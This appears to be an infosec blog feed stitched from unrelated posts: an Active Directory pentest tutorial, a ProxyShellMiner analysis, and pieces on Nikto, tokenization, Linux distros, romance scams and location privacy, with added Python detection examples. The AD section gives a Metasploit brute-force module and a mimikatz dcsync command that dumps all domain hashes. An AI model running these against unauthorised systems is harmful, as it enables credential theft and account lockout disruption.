InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
This article covers Active Directory penetration testing and is aimed at penetration testers and security professionals who want to secure their networks.
Active Directory (AD) is the directory service Microsoft developed for Windows domain networks; "AD penetration testing" (AD pentesting) is the assessment of that service. Through AD you control the domain's computers and the services running on every node of the domain.
The assessment has several stages; the first is reconnaissance of the network. Any user with an account on the domain controller (DC) can log into the domain.
All of the information below is gathered with an ordinary AD user account. A domain username has two parts, the domain name and the user name, as shown below:
Reconnaissance Commands:
+ c:\> net user
Running this command in CMD (Command Prompt) lists the local user accounts on your PC.
+ c:\> whoami
This command shows the currently logged-in user together with its domain, in the form domain\username.
+ c:\> whoami /groups
This command lists the groups the current user belongs to.
+ c:\> net user /domain
This command lists all user accounts in the Active Directory domain. You can also see the groups of an individual user by running:
+ c:\> net user [username] /domain
For a fuller picture you can use the ADRecon script, written by Sense of Security.
It is roughly 12 thousand lines of PowerShell and produces a report covering the AD information you will need.
You can download it from GitHub: https://github.com/sense-of-security/ADRecon. Screenshots of its report:
Picture 2 – List of AD groups. Picture 3 – List of DNS record zones.
Once you have the list of AD users, look at the group policy. Group Policy is a feature of the Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. In Group Policy you can see settings such as the "Account Lockout Policy".
The lockout policy protects network users from password-guessing attacks: after a set number of failed logons the account is locked. You can also see the "Password Policy", a set of rules designed to improve security by requiring users to choose strong passwords and use them properly.
With this data in hand you can carry out attacks against the users, such as:
Brute Force Active Directory
To brute-force accounts in Active Directory you can use a Metasploit Framework auxiliary module, for example:
msf > use auxiliary/scanner/smb/smb_login
In the module's options you set a username file, a password file, and the IP address of a host with the SMB service open.
Then run the module by entering the "run" command.
If you try more wrong passwords than the Account Lockout Policy allows, you will see the message "Account Has Been Locked Out".
If you do this against every account, all users end up locked out and the network is disrupted. Use what you learned from the Password Policy to shape the password list for the brute force.
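As an added example, not taken from the original article, here is the defender's view of the lockout policy and brute-force passages above. It reads Windows Security events 4625 (failed logon) and 4740 (account locked out) and flags two things: a per-account burst of failures that reaches the lockout threshold, and a single source that spreads one bad guess over many accounts, the pattern that ends with every user locked out. The log layout, the account names and addresses, and the 5-attempts-in-10-minutes policy are all constructed assumptions; the only real values are the two event IDs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Real Windows Security event IDs; everything else in this block is constructed.
EVENT_FAILED_LOGON = 4625
EVENT_ACCOUNT_LOCKED = 4740

# Constructed sample log, one "<ISO timestamp> <event id> <account> <source ip>" per line.
# alice: five bad passwords from one host, then a lockout.
# bob..erin: one bad password each from that same host (a spray, below the per-account threshold).
# frank: two unrelated failures hours apart (noise).
SAMPLE_LOG = """\
2024-01-10T09:00:01 4625 CORP\\alice 10.0.0.7
2024-01-10T09:00:02 4625 CORP\\alice 10.0.0.7
2024-01-10T09:00:03 4625 CORP\\alice 10.0.0.7
2024-01-10T09:00:04 4625 CORP\\alice 10.0.0.7
2024-01-10T09:00:05 4625 CORP\\alice 10.0.0.7
2024-01-10T09:00:06 4740 CORP\\alice 10.0.0.7
2024-01-10T09:05:00 4625 CORP\\bob 10.0.0.7
2024-01-10T09:05:01 4625 CORP\\carol 10.0.0.7
2024-01-10T09:05:02 4625 CORP\\dave 10.0.0.7
2024-01-10T09:05:03 4625 CORP\\erin 10.0.0.7
2024-01-10T09:30:00 4625 CORP\\frank 10.0.0.9
2024-01-10T11:30:00 4625 CORP\\frank 10.0.0.9
"""

LINE_RE = re.compile(r"^(\S+) (\d+) (\S+) (\S+)$")


def parse_events(text):
    """Parse log lines into (timestamp, event_id, account, source_ip); malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, eid, account, ip = m.groups()
        events.append((datetime.fromisoformat(ts), int(eid), account, ip))
    return events


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Accounts with >= threshold failed logons inside a sliding window.
    threshold/window mirror an assumed Account Lockout Policy of 5 attempts per 10 minutes."""
    per_account = defaultdict(list)
    for ts, eid, account, _ip in events:
        if eid == EVENT_FAILED_LOGON:
            per_account[account].append(ts)
    hits = {}
    for account, times in per_account.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[account] = max(hits.get(account, 0), count)
    return hits


def spray_sources(events, min_accounts=3, window=timedelta(minutes=10)):
    """Source IPs whose failures touch >= min_accounts distinct accounts in a window.
    One guess per account stays under the lockout threshold, so per-account counting
    misses it; grouping by source is what exposes a spray across the whole user list."""
    per_ip = defaultdict(list)
    for ts, eid, account, ip in events:
        if eid == EVENT_FAILED_LOGON:
            per_ip[ip].append((ts, account))
    hits = {}
    for ip, items in per_ip.items():
        items.sort()
        start = 0
        for end, (t, _account) in enumerate(items):
            while t - items[start][0] > window:
                start += 1
            distinct = {a for _, a in items[start:end + 1]}
            if len(distinct) >= min_accounts:
                hits[ip] = max(hits.get(ip, 0), len(distinct))
    return hits


def locked_out_accounts(events):
    """Accounts that actually reached lockout (event 4740), the loud end of a guessing run."""
    return sorted({account for _, eid, account, _ in events if eid == EVENT_ACCOUNT_LOCKED})


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    print("bursts:", failed_logon_bursts(evts))
    print("sprays:", spray_sources(evts))
    print("locked out:", locked_out_accounts(evts))
```

In practice you would export the domain controllers' Security log into this one-line-per-event form (the export step is not shown and is assumed), then tune threshold and window to the values your own lockout policy uses; the spray check is the one worth keeping even when the lockout policy is strict, because it is designed to stay beneath that policy.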
All password hashes are stored in a file named "NTDS.dit" at this location:
C:\Windows\NTDS
You can extract the hashes from this file with mimikatz, which has a feature that uses the Directory Replication Service (DRS) to retrieve the password hashes held in NTDS.dit. You can run it as shown below:
mimikatz # lsadump::dcsync /domain:pentestlab.local /all /csv
You will then see the hashes and, where it can be recovered, the password.
Active Directory comprises several services that run on Windows servers; it holds user groups, applications, printers, and other resources.
It helps server administrators manage the devices connected to the network, and it includes services such as Domain Services, Certificate Services, Lightweight Directory Services, Federation Services, and Rights Management Services.
Active Directory penetration testing is necessary for any organization, as APT groups are actively targeting Active Directory using a variety of techniques.
In this Help Net Security video, Daniel Dos Santos, Head of Security Research at Forescout, talks about recent research, which has revealed how attackers can move laterally between vulnerable networks and devices found at the controller level of critical infrastructure. This would allow them to damage assets such as movable bridges physically.
This lateral movement lets attackers access industrial control systems and cross often-overlooked security perimeters to cause physical damage. From sensors that measure and detect pressure, temperature, flow and levels of liquids, air, and gases, to analyzers that determine chemical compositions and actuators that enable machines to move. Moving through these devices at the lowest levels, attackers can circumvent built-in functional and safety limitations to cause significant damage or disruption to services, or worse, pose a potential threat to life.
To demonstrate the potential implications, Forescout has built an industry-first proof-of-concept (PoC) which shows how attackers can move laterally on the controller level (Purdue level 1) to cause cyber and physical impact, as illustrated through the scenario of damaging a movable bridge during a closing sequence.
As part of the research, two new vulnerabilities are also being disclosed for the first time – CVE-2022-45788 and CVE-2022-45789 – which allow remote code execution and authentication bypass, respectively, on Schneider Electric Modicon Unity Programmable Logic Controllers (PLCs).
Modicon PLCs are used in a wide range of industrial processes and critical infrastructure, including in industries such as water and wastewater, mining, manufacturing, and energy. Whilst these devices should not be accessible online, Forescout has found that close to a thousand PLCs have been exposed, with France (33%), Spain (17%), Italy (15%), and the United States (6%) revealed as the countries with the most exposed devices.
The number of devices visible is just a small indication of the popularity of these PLCs, but these devices also highlight some of the critical facilities that rely on them. For example, several devices were connected to hydro power plants, solar parks and airports.
ProxyShellMiner is being distributed to Windows endpoints by a very elusive malware operation, according to Morphisec.
To generate income for the attackers, “ProxyShellMiner” deploys cryptocurrency miners throughout a Windows domain using the Microsoft Exchange ProxyShell vulnerabilities.
“After successfully breaching an Exchange server and obtaining control, the attackers use the domain controller’s NETLOGON folder to ensure the miner executes throughout the domain, similar to how software is delivered through GPO”, Morphisec reports.
Researchers noticed that the attackers were utilizing four C2 servers. All of the files the malware depends on are hosted on the legitimate, compromised mail servers.
“Mining cryptocurrency on an organization’s network can lead to system performance degradation, increased power consumption, equipment overheating, and can stop services”, according to Morphisec.
Technical Analysis of the ProxyShellMiner Malware
The malware needs a command line parameter that acts as a password for the XMRig miner component in order to activate.
“This parameter is later used as a key for the XMRig miner configuration, and as an anti-runtime analysis tactic”, Morphisec reports.
The parameter serves as an anti-analysis technique and as a password for the XMrig miner
The XOR decryption algorithm, an XOR key, and an embedded dictionary are all used by ProxyShellMiner. The subsequent embedded code modules are then executed using the C# compiler CSC.exe with “InMemory” compile parameters.
The malware then downloads a file with the name “DC DLL” and uses .NET reflection to get the task scheduler, XML, and XMRig key arguments. The decryption of additional files is done using the DLL file.
By creating a scheduled task that starts when the user logs in, a second downloader achieves persistence on the compromised system. The report says four other files and the second loader are downloaded from a remote resource.
The deobfuscated scheduled task
Using a technique called “process hollowing,” that file determines which of the installed browsers on the hacked system would be used to inject the miner into its memory space. The mining process then starts after selecting a random mining pool from a hardcoded list.
Picking a mining pool
Setting a firewall rule that blocks all outgoing traffic and is applicable to all Windows Firewall profiles is the last stage in the attack chain. This is done to reduce the likelihood that defenders may find infection signs or get notifications about a possible compromise from the compromised system.
“The malware waits at least 30 seconds while the target machine blocks any outbound connection. It does this to tamper with the process runtime behavior analysis of common security solutions”, the researchers note.
Adding a firewall rule to block all outgoing traffic
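The block-all-outbound rule described above is a concrete indicator a defender can check for. As an added example (not Morphisec's code and not part of the original report), the block below parses firewall rule listings in the layout of `netsh advfirewall firewall show rule name=all` and flags any enabled outbound rule that blocks every protocol to every remote address on all three profiles. The three sample rules and their names are constructed; the output layout is assumed to follow the usual "Key: value" lines that command prints.

```python
# Constructed sample in the layout of `netsh advfirewall firewall show rule name=all`.
# The rule names and values are invented for this example.
SAMPLE_NETSH_OUTPUT = """\
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Block Outbound Traffic
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             Any
Edge traversal:                       No
Action:                               Block

Rule Name:                            Old Test Rule
----------------------------------------------------------------------
Enabled:                              No
Direction:                            Out
Profiles:                             Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             Any
Edge traversal:                       No
Action:                               Block
"""

ALL_PROFILES = {"Domain", "Private", "Public"}


def parse_rules(text):
    """Split the listing into one dict per rule; a 'Rule Name:' line starts a new rule."""
    rules, current = [], None
    for line in text.splitlines():
        if line.startswith("Rule Name:"):
            current = {"Rule Name": line.split(":", 1)[1].strip()}
            rules.append(current)
        elif current is not None and ":" in line and not line.startswith("-"):
            key, value = line.split(":", 1)
            current[key.strip()] = value.strip()
    return rules


def is_block_all_outbound(rule):
    """True when the rule silently cuts every outbound connection on every profile:
    enabled, outbound, Block, any remote address, any protocol, any remote port."""
    profiles = {p.strip() for p in rule.get("Profiles", "").split(",") if p.strip()}
    return (
        rule.get("Enabled") == "Yes"
        and rule.get("Direction") == "Out"
        and rule.get("Action") == "Block"
        and rule.get("RemoteIP") == "Any"
        and rule.get("Protocol") == "Any"
        and rule.get("RemotePort", "Any") == "Any"
        and ALL_PROFILES <= profiles
    )


def suspicious_rules(text):
    """Names of rules matching the indicator, for a triage list."""
    return [r["Rule Name"] for r in parse_rules(text) if is_block_all_outbound(r)]


if __name__ == "__main__":
    for name in suspicious_rules(SAMPLE_NETSH_OUTPUT):
        print("block-all-outbound rule found:", name)
```

To use it on a real host, save the command's output to a file on the Windows machine and feed the file's contents to suspicious_rules. A hit is a lead rather than a verdict: some security products and hardened builds also install broad outbound block rules, so compare the rule's name, creation time and the host's other symptoms (the logon-triggered scheduled task, a hollowed browser process running at high CPU) before calling it an infection.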
Final Thoughts
ProxyShellMiner doesn’t just disrupt business networks, drive up power bills, overheat equipment, and stop services from operating. It also gives threat actors a foothold for further malicious activity.
“Once attackers have a foothold in a network, they have deployed web shells, backdoors, and used tunneling utilities to further compromise victim organizations”, Morphisec notes.
Hence, Morphisec encourages all administrators to install all available security updates and employ thorough and all-encompassing threat detection and defense measures to reduce the danger of ProxyShellMiner attacks.
In this article, I will explain how to use Nikto on Kali Linux.
First, install Nikto either from GitHub or with the apt install command in the terminal.
Nikto's help output lists the options and parameters that let you use the tool efficiently.
Start with the basic syntax to check a website for vulnerabilities.
Nikto can also scan over SSL on port 443, the port HTTPS sites use (HTTP uses port 80 by default). So we are not limited to scanning old plain-HTTP sites; we can run vulnerability assessments against sites that use SSL, which is practically a requirement these days to be indexed in search results.
If we know the target site uses SSL, we can tell Nikto up front and save scan time by adding -ssl to the end of the command.
With this tool, then, we can assess a website for vulnerabilities.
A large number of e-commerce payment platforms use effective payment gateway tools and effectively integrate them with an acceptable payment strategy. Today’s e-commerce websites need to integrate anti-fraud tools, renew bank cards, integrate multiple gateways, and manage alternative payment methods.
It is important to get these complex integrations right and bring them together into one functioning system; choosing the right tokenization partner is the key to success in these processes.
What is the tokenization process and why is it needed?
Tokenization is an important process of replacing sensitive data, such as credit card numbers, with unique identifying information while preserving all important data information; a tokenization solution is a form of using a unique security key to provide an appropriate level of security to important confidential data.
Think of tokenization as a secret code that uses a key to retrieve an encrypted message. Some versions of the credit card number store the last four digits; however, the remaining digits of the credit number are random.
In this case, you can safely store the token in the database. Anyone with access to this token cannot use it to compromise your credit card account. For these tokens to be used to process credit card transactions, they must be re-linked to the original credit card numbers. Typically, this mapping is performed by a secure third party. All this is done to ensure full security.
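The mechanics described above, as an added example that is not part of the original article: a toy token vault that plays the "secure third party" role, replacing a card number with a token that keeps only the last four digits and holding the only copy of the mapping back to the real number. The Luhn check and the choice to make every token fail that check (so a token can never be mistaken for a real card number) are my assumptions, not anything the article specifies; 4111 1111 1111 1111 is a well-known test card number.

```python
import secrets


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by card networks; True for a well-formed card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Display form that reveals only the last four digits."""
    return "*" * (len(pan) - 4) + pan[-4:]


class TokenVault:
    """Toy vault standing in for the secure third party that holds the token-to-PAN mapping.
    A token keeps the card's last four digits; every other digit is random, and the token is
    chosen to fail the Luhn check so it cannot pass as a real card number (a design choice here)."""

    def __init__(self):
        self._pan_by_token = {}
        self._token_by_pan = {}

    def tokenize(self, pan: str) -> str:
        pan = pan.replace(" ", "")
        if not (pan.isdigit() and 12 <= len(pan) <= 19 and luhn_valid(pan)):
            raise ValueError("not a plausible card number")
        if pan in self._token_by_pan:            # the same card always maps to the same token
            return self._token_by_pan[pan]
        while True:
            prefix = "".join(secrets.choice("0123456789") for _ in range(len(pan) - 4))
            token = prefix + pan[-4:]
            if token not in self._pan_by_token and not luhn_valid(token):
                break
        self._pan_by_token[token] = pan
        self._token_by_pan[pan] = token
        return token

    def detokenize(self, token: str) -> str:
        """Only the vault can turn a token back into the card number; a stolen token
        from the merchant's database yields nothing but the last four digits."""
        return self._pan_by_token[token]


if __name__ == "__main__":
    vault = TokenVault()
    tok = vault.tokenize("4111 1111 1111 1111")
    print("stored in merchant DB:", tok, "displayed as", mask(tok))
    print("vault resolves to:", vault.detokenize(tok))
```

The point the example makes concrete is where the risk moves: the merchant database now holds only tokens, so the vault's mapping store is the asset that needs the strongest controls, and the detokenize path is the one to lock down with authentication and logging.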
Blockchain technology is a technology that most people associate only with cryptocurrencies. This attribution is not entirely incorrect, as the blockchain was created for the Bitcoin cryptocurrency. However, much has changed since 2009 (the year Bitcoin appeared), and the scope of blockchain technology continues to actively expand.
One of the key applications of this technology today is tokenization, a secure form of digitization based on the blockchain technology mentioned above. The process of tokenization consists of assigning a specific value to a symbol, which can exist materially or immaterially, and is a digital “token” that stores data. With this efficient solution, you can securely buy and sell your assets online.
Examples of this use of tokens include the value of the stock market. Most of us associate stocks and bonds with paper-based notices of ownership of those assets, but tokenization allows us to replace those paper notices with digital versions. The implementation of traditional solutions in the digital world simplifies and optimizes a large number of important processes, making them significantly more efficient.
The terms “token” and “cryptocurrency” are often confused and used interchangeably; not surprisingly, both concepts are closely related to blockchain technology. The key difference between cryptocurrencies and tokens is that cryptocurrencies are a means of payment, whereas tokens cannot; they can be compared to a kind of chip.
A token is created using smart contracts on a specific blockchain network and can perform various key functions. Each blockchain network can contain an unlimited number of tokens.
On the other hand, a smart contract is a kind of computer program embedded in a certain blockchain network that automatically enforces the terms contained in it. Both tokens and cryptocurrencies can be transferred on the blockchain network; however, token transaction fees depend on the cryptocurrency.
What information must be provided for tokenization?
Tokenization is commonly used to protect credit card numbers, a practice mandated by the Payment Card Industry Council (PCI). There are many other use cases, though: tokenization offers a range of effective tools for organizations that need to protect confidential data reliably.
Consider personal or personally identifiable information. HIPAA and the General Data Protection Regulation (GDPR) require confidential processing, anonymization, and secure storage of personal data. Organizations should use tokenization whenever the business needs to store confidential information securely, such as:
ID number;
Date of birth;
Gender or race;
Driver’s license;
Credit card number;
Valid phone number;
Bank account number;
Social insurance number;
Current residential address of clients;
Because tokens are so versatile, they come in several types that perform different functions. One of the key distinctions is between fungible and non-fungible tokens. Payment tokens, for example, are used to make payments. Security tokens mainly serve to protect investors; they are regulated by law and represent specific stocks, bonds, or other assets of genuine interest.
Are my tokens safe?
Undoubtedly, there are many advantages to using tokens, but is it safe to store data? Security is considered one of the most important benefits of tokenization. Stability, irreversibility of transactions, and elimination of intermediaries are just some of the characteristics that affect security when using blockchain technology.
In addition, the security of tokenization is provided by smart contracts that allow parties to trade directly. For example, selling real estate in the form of tokens does not require a notary or a real estate agent. Everything is done quickly and directly.
Note that each contracting party must ensure that personal tokens are properly stored and protected from loss to properly act as guarantors of successful transactions. Tokenization is a form of business digitization based on blockchain technology.
The potential of tokenization is huge and has yet to be fully explored. Tokens are divided into different types. The most common use of tokens is to digitize different types of assets, such as physical assets, digital assets, projects, company shares, shares, or loans.
What are the different types of tokenization processes?
When it comes to PCI tokens, there are three key types of tokenization: gateway tokenization, end-to-end tokenization, and payment service tokenization.
Gateway tokenization. When you do e-commerce, you most likely get paid through a payment gateway. Most gateways have technology that lets you securely store a customer's card in the system and later charge it, refund it, and delete the card data. The downside is that each gateway provides its own token scheme, so its tokens cannot be used with any other gateway. Changing gateways is often a time-consuming and expensive process of moving customer data to the new gateway for secure processing, and in some cases the old gateway may not allow it at all.
End-to-end tokenization. Some independent tokenization providers have technology that sits between your e-commerce site and the gateway. These end-to-end token providers allow you to keep using your existing gateway integration code.
One of the key advantages of this type of tokenization is that it uses existing technology and can be adapted at a very fast pace. It also has the advantage of modularity. Unlike gateway tokenization, modularity can be actively used for more than just credit card payments. You can use the tokenization model to connect to most APIs and tokenize data other than credit card data.
End-to-end tokenization is an evolution of gateway tokenization. This gives payment solutions the freedom to route transactions to different gateways in real-time, avoiding costly and time-consuming transfers of card data between different payment platforms.
Tokenization processes of various important payment services
A key tokenization strategy is the payment service model. This model offers a single API that, when integrated, can route payments to multiple gateways. The payment service model is best suited for companies with more complex payment needs.
This model works well when a company needs to pay in several regions or several different currencies or through several gateways. A disadvantage of the payment service model is that existing gateway embed code cannot be reused.
In addition to reduced PCI coverage and increased security, the tokenized payment service model has unique key benefits from its active use. The payment services model not only simplifies your embed code but also takes control of your tokens away from the payment gateway. Unlike gateway tokenization, tokens provided by third parties can be actively used with supported gateways.
Tokens issued by payment gateways cannot be used against competing alternative gateways. Security and compliance alone are reasons enough to implement a popular solution like the tokenization of various assets that are important to you, your company, and your customers.
The truth is that key security requirements for online payments are difficult to implement on your own. In particular, startups often choose to sacrifice security for time to market. Accepting online payments makes your business a target for cybercriminals. Hiring security experts and implementing effective tokenization processes can save your business environment valuable time and money in the long run.
Keep these practical tips in mind. Choose a reliable tokenization partner, test the tokenization, what level of protection you can achieve by working on the integration, and find a vendor that can integrate multiple gateways, methods, and services into a single integration. One of the key technologies needed to connect all payment solutions is tokenization.
A trusted provider fully controls tokens, provides redundancy, reduces PCI coverage, and improves the security standards in place in your business environment.
What can be tokenized?
The use cases for tokenization can grow endlessly. Since anything can be digitized, tokenization is often used in professional life. These are various business projects that can demonstrate the most practical examples of using tokenization.
Digitization of the company involves the creation of tokens that are closely related to a specific project. Tokenization techniques that add value to tokens can be used as an indispensable tool for automating processes in companies and as a means of financing them. Real estate tokenization is becoming more and more popular worldwide due to the following features: transaction speed, lack of intermediaries, and security.
The process of property tokenization involves issuing tokens on the blockchain network and linking them to certain properties. Thus, the investor becomes a co-owner or owner of a certain asset, the shares of which can be represented in tokens.
Using blockchain technology and a specially designed platform, it is also possible to assign unique numbers to gems and certain forms of ore to determine their authenticity.
Raw materials registered with digital numbers can then be identified by verifying their origin, properties, and associated processes. NFT tokens have the unique potential to revolutionize both the physical and digital art markets. Each NFT token has a unique, non-tradable value that allows you to express your interest in the rights to a work of art, making investing in art an easy and fast process.
Linux is generally acknowledged as the third member of the PC operating-system trio, alongside Windows and macOS. Here we have provided you with a top 10 best Linux distros list for 2023, for all professionals.
Linux can be called the most rebellious of the three, because it is flexible and customizable and comes in a range of distros built by different organizations for different purposes.
Moreover, the Linux "core" (kernel) and most distros are free, which is a significant selling point for the OS compared to Windows and macOS.
There are Linux distros for many situations. Whether you are after an OS tailored for desktops, workstations, laptops, servers, gaming, or A/V editing, there is a distro out there for everyone.
So we are trying to give you a summary of the most reliable and popular Linux distros available, each of which is tailored for desktop use.
You can install these Linux distros on a Chromebook, PC, or Mac as a substitute for your current operating system, use both in a dual-boot scenario, or run them alongside your current system with one of the best virtualization tools out there.
Do you want a Linux distro similar to Windows? Do you prefer typing commands to clicking? Do you want something focused on privacy? Each of these and several other factors will decide which Linux distro is most suitable for you.
Usually, a top Linux distros list is customized to meet the requirements of particular users. For example, Kali Linux is specifically created for digital forensics and penetration testing. Here we have selected the top 10 best Linux distros and updated the list from our popular Linux distros list for 2022.
What is Linux Distro?
As we said before, Linux is flexible and customizable and includes a host of unique features for different uses.
We can also say that Linux is home to nearly every programming language, and it is a Unix-like operating system.
This open-source operating system is built around the Linux kernel and is usually packaged as one of many Linux distributions.
A Linux distribution, commonly known as a distro, is an operating system assembled from a software collection based on the Linux kernel.
Most users get Linux by downloading one of the many distros. Linux operating systems are most popular with coders, programmers, and gamers.
Linux is a gift to the world that has shaped modern life; today we cannot imagine a single moment without technology.
Dynamic firewall; better end-user software; virtual desktop support.
Elementary OS: easy image resizing; keyboard shortcuts cheat sheet; bold use of color.
Kali Linux: full customization; full disk encryption; metapackages.
MX Linux: one-click enabling of event sounds; hibernation now enabled by default; easy and flexible installation.
Linux has produced some of the most significant and meaningful innovations in modern technology.
At first, Linux was not in the form it is today; it has evolved a long way through crafting and drafting by an open-source-friendly community.
Without doubt, Linux does not only come with a polished desktop manager; it also contributes a wide range of useful, productive free and open-source software that covers all the basic needs of users.
Now, without wasting more time, let's get started and explore the list below.
Using technology powered by AI (Artificial Intelligence), scammers can now take advantage of potential victims looking for love online by deceiving them by using modern hooks.
With the rapid advancement of AI technology, scammers now have a powerful ally in the form of popular AI tools such as ChatGPT. These tools allow scammers to create anything from seemingly harmless intro chats to elaborate love letters in a matter of seconds, making it easier than ever for them to deceive unsuspecting victims.
By leveraging the impressive capabilities of these AI tools, scammers can quickly generate custom-made content designed to prey on their target’s emotions. The use of AI-generated content has made it increasingly difficult to identify and avoid scams.
One of the most common tactics used in online dating and romance scams is the practice of “catfishing.” This involves the creation of a fake online persona to lure unsuspecting victims into a relationship with the sole intention of extracting financial gain.
The term “catfishing” derives from the act of using a fake profile to hook a victim, much like fishing with a bait hook.
Convincing Scam Messages
In a recent research report titled “Modern Love” by McAfee, over 5,000 people from around the world were presented with a sample love letter and asked to determine if it was written by a person or generated by artificial intelligence (AI).
“My dearest, The moment I laid eyes on you, I knew that my heart would forever be yours. Your beauty, both inside and out, is unmatched and your kind and loving spirit only add to my admiration for you. You are my heart, my soul, my everything. I cannot imagine a life without you, and I will do everything in my power to make you happy. I love you now and forever. Forever yours …”
According to a research report by McAfee, when presented with the above sample love letter and asked to determine if it was written by a person or generated by AI, one-third of respondents (33%) believed it was written by a person, while 31% believed it was written by an AI.
While the remaining 36% of participants were unable to determine if the letter was written by a human or a machine. The study aimed to investigate the extent to which AI-generated content is perceived as authentic and genuine in the context of romantic relationships.
User Interaction Data Analysis
A recent survey found that a majority of people (66%) have been contacted by a stranger through social media or SMS and subsequently began chatting with them. Facebook and Facebook Messenger (39%) and Instagram and Instagram direct messages (33%) were cited as the most common platforms used by strangers to initiate conversation.
Unfortunately, many of these interactions eventually led to requests for money transfers. In fact, 55% of respondents reported being asked to transfer money by a stranger.
While the majority of these requests (34%) were for less than $500, a significant number (20%) involved amounts exceeding $10,000.
More concerning, 9% of respondents were asked to provide their government or tax ID number, while 8% were asked to share their account passwords for social media, email, or banking.
Scam Detection
It has been reported that people discovered they had been catfished when they experienced the following scenarios:
Neither a face-to-face meeting nor a video conference could be arranged. (39%)
Upon finding the scammer’s photo online, they immediately realized that it was a false representation of the scammer. (32%)
During the conversation, the person asked for personal information. (29%)
The individual did not wish to speak on the telephone. (27%)
Several typographical errors and illogical sentences were present. (26%)
If the scammer asks for money, that is the single most telling sign that he or she is running an online dating or romance scam.
This kind of scam usually entails a little story as part of the request, often focusing on a hardship experienced by the scammer.
Mitigations
Here below we have mentioned all the mitigations to avoid getting tangled up in an online dating or romance scam:
The best way to know if this new love interest is right for you is to speak with someone you trust.
It’s important to take your relationship slowly in the beginning.
If the individual uses a profile picture, try a reverse image search.
Make sure that you do not send money or gifts to anyone who you have not met personally before.
Whenever you receive a friend request from a stranger, say no.
If you have any personal information on any unwanted website, make sure you clean it up.
It is strongly advised that you do not click on any malicious links that have been sent to you by a scammer.
A chatbot like ChatGPT is a very powerful tool, but it is important to keep in mind that it is only a tool; in itself it is neither good nor bad.
It is the user who decides how to use it, and so it is up to them what they make of it.
Your devices and apps really, really want to know where you are, whether it’s to tell you the weather, recommend some restaurants you might like, or better target advertising at you. Managing what you’re sharing and what you’re not sharing, and when, can quickly get confusing.
It’s also possible that you have inconsistencies in the various location histories logged by your devices: Times when you thought you’d switched off and blocked location sharing but you’re still being tracked, or vice versa.
Here we’ll cover everything you need to consider when it comes to location tracking, and hopefully simplify it along the way. Whether you want to give out access to your current location or not, you should be in control of these settings, and not be caught unawares by additional options that you missed.
How Location Tracking Gets Confusing
What happens if you distinctly remember turning location tracking off on a device, yet your position is still popping up on a map? Or maybe you thought you’d left the feature on, yet you’re seeing gaps in your location history? There are a few explanations, but essentially you need to remember all the different ways your location can be logged: by your devices, by your apps, and by websites you visit.
For example, you might have disabled location tracking on a phone but left it enabled on a tablet. Alternatively, you might have a laptop that’s tracking where you are in the background, even though you thought you’d disabled the feature in the apps you use. If you want location tracking completely enabled or disabled, you need to factor in all these different ways of keeping tabs on where you are.
If you have a Google account, this is a good illustration. Head to your account settings on the web, then choose Data and Privacy and Location History. Select Devices on This Account, which may reveal some phones, tablets, and laptops that you’d forgotten about—any device with a check next to it in this list is saving your movements to your Google account for future reference.
You can click Turn Off to disable this, but note the caveats that are listed in the confirmation box that appears onscreen: Your location might still be logged by your mobile devices, by the Find My Device service that helps you recover lost hardware, and by Google Maps when you’re navigating or searching around the area you’re in. This Location History setting is more of an overall toggle switch, affecting features such as the Google Timeline and the ability to quickly look up places you visit regularly.
From the main Google account screen, there are several more places where your location gets logged and shared: Click Data and Privacy then Web & App Activity to manage location data saved by Google Maps and other apps and websites, and click People and Sharing then Manage Location Sharing to see a list of specific contacts who can see where you are through various Google services.
Managing Location Tracking on Mobile
The steps to manage your location on Android vary slightly depending on the manufacturer of your phone, but the menus and instructions involved are broadly similar. On Google Pixel devices, you can open up Settings then select Location: You’ll see the Use Location toggle switch, and if you turn this off, none of your apps will be able to know where you are, nor will Google.
If you leave the Use Location toggle switch on, you can customize location access for individual apps further down on the same screen. Note that you can choose to allow apps to know where you are at all times, or only when the app in question is running in the foreground—tap on any app in the list to make changes.
Over on iOS, it’s a similar setup. If you select Privacy & Security from Settings, and then tap Location Services, you can turn off location tracking for the phone and all the apps on it. If you choose to leave this enabled, you can manage individual app access to your location via the list underneath. As on Android, you can choose to restrict apps to knowing your location only when the particular app itself is running, or allow them to monitor it in the background too.
Erasing the location data that’s been collected on you is a complex process, as you need to check the records and the settings of every app that’s ever had access to your location. For Google and Google’s apps, you can head to your Google account on the web, then choose either Location History or Web & App Activity under Data and Privacy to wipe this data from the record. You’ll also find options for automatically deleting this data after 3, 18, or 36 months.
Apple doesn’t log your movements in quite the same way, but it does build up a list of places you visit frequently (like your home and perhaps your office) so you can quickly get to them again. To clear this list on your iPhone, open Settings then choose Privacy & Security, Location Services, System Services, and Significant Locations. You can clear this list and stop it from populating in the future.
Managing Location Tracking on Desktop
Your laptop or desktop computer is unlikely to be fitted with GPS capabilities, so it won’t track your location in quite the same way as your phone, but applications, websites, and the operating system will still have some idea where you are—primarily through the locations that you sign into the web from (via your home Wi-Fi, for example).
